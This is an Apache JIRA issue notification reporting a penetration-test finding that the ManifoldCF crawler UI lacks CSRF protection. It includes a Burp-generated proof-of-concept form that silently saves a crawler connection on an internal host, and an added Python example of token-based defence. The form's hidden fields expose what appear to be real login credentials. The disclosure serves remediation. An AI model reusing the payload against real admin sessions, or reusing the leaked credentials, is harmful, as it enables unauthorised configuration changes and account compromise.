[ https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

roel goovaerts updated CONNECTORS-1595:
---------------------------------------
    Description: 
Below is the full analysis and description as a result from the penetration test.

*Summary*
The application is vulnerable to Cross-Site Request Forgery (CSRF).
A cross-site request forgery attack uses the following scenario:
1. An attacker creates a web page that includes an image or a form pointing to the attacked application. The image source would actually be a URL with parameters pointing to the application page that performs some action. In case of a form, the form action would point to the action page in the target application, and the form is submitted automatically by JavaScript when the page is viewed.
2. The attacker tricks the victim user into browsing to this page. The attacker may get the victim to click a link, or embed the attacking HTML code into some page the victim views, for example in a bulletin board or chat.
3. When the victim views the attacker's page, his browser sends a request prepared by the attacker to the attacked application. If the victim is logged in to the target application, his browser will possess all necessary session tokens, so the request will appear as authorized to the application and succeed.
A cross-site request forgery attack uses the fact that the victim's browser possesses the necessary authentication tokens to perform some actions in the target application.

*Impact*
A remote, unauthenticated attacker that can trick an authenticated user into clicking a link crafted by the attacker or opening a malicious web page can force the victim to unknowingly perform various actions within the application.
Given that the whole application is not protected against CSRF, any action that an administrator can take on Apache Manifold could be unknowingly performed if they fall for a CSRF attack.

*Affected Systems*
 * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]

*Description*
It appears that the application does not implement any CSRF protection. Consider the following example. An attacker tricks a logged-in application user into visiting a page containing the following code:
{code:html}
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp" method="POST" enctype="multipart/form-data">
<input type="hidden" name="op" value="Save" />
<input type="hidden" name="type" value="connection" />
<input type="hidden" name="tabname" value="Name" />
<input type="hidden" name="isnewconnection" value="false" />
<input type="hidden" name="connname" value="clix&#45;fr" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="classname" value="org&#46;apache&#46;manifoldcf&#46;crawler&#46;connectors&#46;webcrawler&#46;WebcrawlerConnector" />
<input type="hidden" name="authorityname" value="&#95;none&#95;" />
<input type="hidden" name="throttlecount" value="0" />
<input type="hidden" name="maxconnections" value="10" />
<input type="hidden" name="email" value="ferdi&#46;klomp&#64;craftworkz&#46;nl" />
<input type="hidden" name="robotsusage" value="none" />
<input type="hidden" name="metarobotstagsusage" value="all" />
<input type="hidden" name="regexp&#95;bandwidth&#95;0" value="" />
<input type="hidden" name="insensitive&#95;bandwidth&#95;0" value="false" />
<input type="hidden" name="connections&#95;bandwidth&#95;0" value="2" />
<input type="hidden" name="rate&#95;bandwidth&#95;0" value="64" />
<input type="hidden" name="fetches&#95;bandwidth&#95;0" value="12" />
<input type="hidden" name="bandwidth&#95;count" value="1" />
<input type="hidden" name="acredential&#95;count" value="0" />
<input type="hidden" name="scredential&#95;0&#95;regexp" value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc&#47;" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;regexp" value="login" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;type" value="form" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;matchregexp" value="validation" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;overridetargeturl" value="" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;op" value="Continue" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;param" value="username" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;value" value="id996812" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;0&#95;password" value="" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;op" value="Continue" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;param" value="password" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;value" value="Th1sIs4cl1X" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;1&#95;password" value="" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;op" value="Continue" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;param" value="login&#45;form&#45;type" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;value" value="pwd" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;2&#95;password" value="" />
<input type="hidden" name="scredential&#95;0&#95;0&#95;loginparamcount" value="3" />
<input type="hidden" name="scredential&#95;0&#95;loginpagecount" value="1" />
<input type="hidden" name="scredential&#95;count" value="1" />
<input type="hidden" name="regexp&#95;trust&#95;0" value="https&#58;&#47;&#47;intrauat&#46;web&#46;bc" />
<input type="hidden" name="trustall&#95;trust&#95;0" value="false" />
<input type="hidden" name="trust&#95;count" value="1" />
<input type="hidden" name="proxyhost" value="" />
<input type="hidden" name="proxyport" value="" />
<input type="hidden" name="proxyauthusername" value="" />
<input type="hidden" name="proxyauthdomain" value="" />
<input type="hidden" name="proxyauthpassword" value="" />
<input type="hidden" name="client&#95;timezone&#95;offset" value="&#45;60" />
<input type="hidden" name="client&#95;timezone" value="Europe&#47;Zurich" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
{code}
When the victim's browser parses the page and tries to load images, it will cause them to execute any action of the attacker's choosing on Manifold.

*Recommendations*
The usual approach to preventing CSRF attacks is to add a new parameter with an unpredictable value to each form or link that performs some action in the application, commonly referred to as a CSRF token. The parameter value should have enough entropy so that it cannot be predicted by an attacker and should be unique to the current user session. When the user submits the form or clicks the link, the server-side code checks the parameter value. If it is valid, the request is accepted, otherwise it is denied. The attacker has no way of knowing the value of the unpredictable parameter, so he cannot construct a form or link that will submit a valid request.
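The synchronizer-token check recommended above, worked through as an added illustration. This is not ManifoldCF code: the `Session` and `Request` classes, the `csrf_token` field name and the `handle_execute` stand-in for the execute.jsp action handler are assumptions made for the example, and the scenario in `demo()` (one logged-in admin, one legitimate submit of the op=Save/type=connection form, two forged submits) is constructed.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Methods that must never change state; a token is only demanded for the others.
# This exemption is sound only if no action (such as the op=Save handler) is also
# reachable via GET, which is exactly what an <img src=...> CSRF would exploit.
SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS"})

TOKEN_FIELD = "csrf_token"  # hypothetical form-field name, not a ManifoldCF parameter


@dataclass
class Session:
    """Server-side session; the token is generated once per login with a CSPRNG
    (256 bits of entropy) and is bound to this session only."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    form: Dict[str, str]
    session: Optional[Session]  # None when the browser sent no valid session cookie


def hidden_token_input(session: Session) -> str:
    """What every server-rendered form would embed. A cross-site page cannot read
    this value: the same-origin policy stops it reading the authenticated response."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{session.csrf_token}" />'


def csrf_check(request: Request) -> Tuple[bool, str]:
    """Synchronizer-token check for one request. Returns (allowed, reason)."""
    if request.method.upper() in SAFE_METHODS:
        return True, "safe method"
    if request.session is None:
        return False, "no session"
    submitted = request.form.get(TOKEN_FIELD, "")
    if not submitted:
        return False, "missing token"
    # Constant-time comparison so response timing does not leak matching prefixes.
    if not hmac.compare_digest(submitted.encode(), request.session.csrf_token.encode()):
        return False, "token mismatch"
    return True, "token valid"


def handle_execute(request: Request) -> str:
    """Hypothetical stand-in for the execute.jsp action handler, gated by the check."""
    allowed, reason = csrf_check(request)
    if not allowed:
        return f"403 Forbidden ({reason})"
    return f"200 performed op={request.form.get('op')} type={request.form.get('type')}"


def demo() -> Dict[str, str]:
    """Constructed scenario: one logged-in admin, one legitimate and two forged submits."""
    admin = Session(user="admin")
    path = "/mcf-crawler-ui/execute.jsp"
    save_connection = {"op": "Save", "type": "connection", "tabname": "Name"}

    # Legitimate: the admin submits a form the server rendered, so it carries the token.
    legit = Request("POST", path, {**save_connection, TOKEN_FIELD: admin.csrf_token}, admin)
    # Forged: an attacker page auto-submits the same fields; the browser attaches the
    # session cookie, but the attacker never saw the token, so the field is absent.
    forged = Request("POST", path, dict(save_connection), admin)
    # Forged with a guessed token: 256 random bits will not collide with the real one.
    guessed = Request("POST", path, {**save_connection, TOKEN_FIELD: secrets.token_urlsafe(32)}, admin)
    return {
        "legit": handle_execute(legit),
        "forged": handle_execute(forged),
        "guessed": handle_execute(guessed),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:8s} -> {outcome}")
```

Running the file prints the three outcomes: the legitimate submit returns 200 and both forged submits are rejected with 403. The check must sit in front of every state-changing entry point of the crawler UI, and every form and action link must embed the session's token, otherwise the unprotected entry points remain exploitable; checking the Origin or Referer header and marking the session cookie SameSite are independent defences in depth that can be layered on top.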

*References*
 * OWASP - Cross-Site Request Forgery - [https://www.owasp.org/index.php/Cross-Site_Request_Forgery]

  was:It appears that manifoldcf does not implement any CSRF protection.


> cross-site request forgery vulnerability
> ----------------------------------------
>
>                 Key: CONNECTORS-1595
>                 URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
>             Project: ManifoldCF
>          Issue Type: Improvement
>          Components: API
>    Affects Versions: ManifoldCF 2.12
>            Reporter: roel goovaerts
>            Priority: Minor
>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)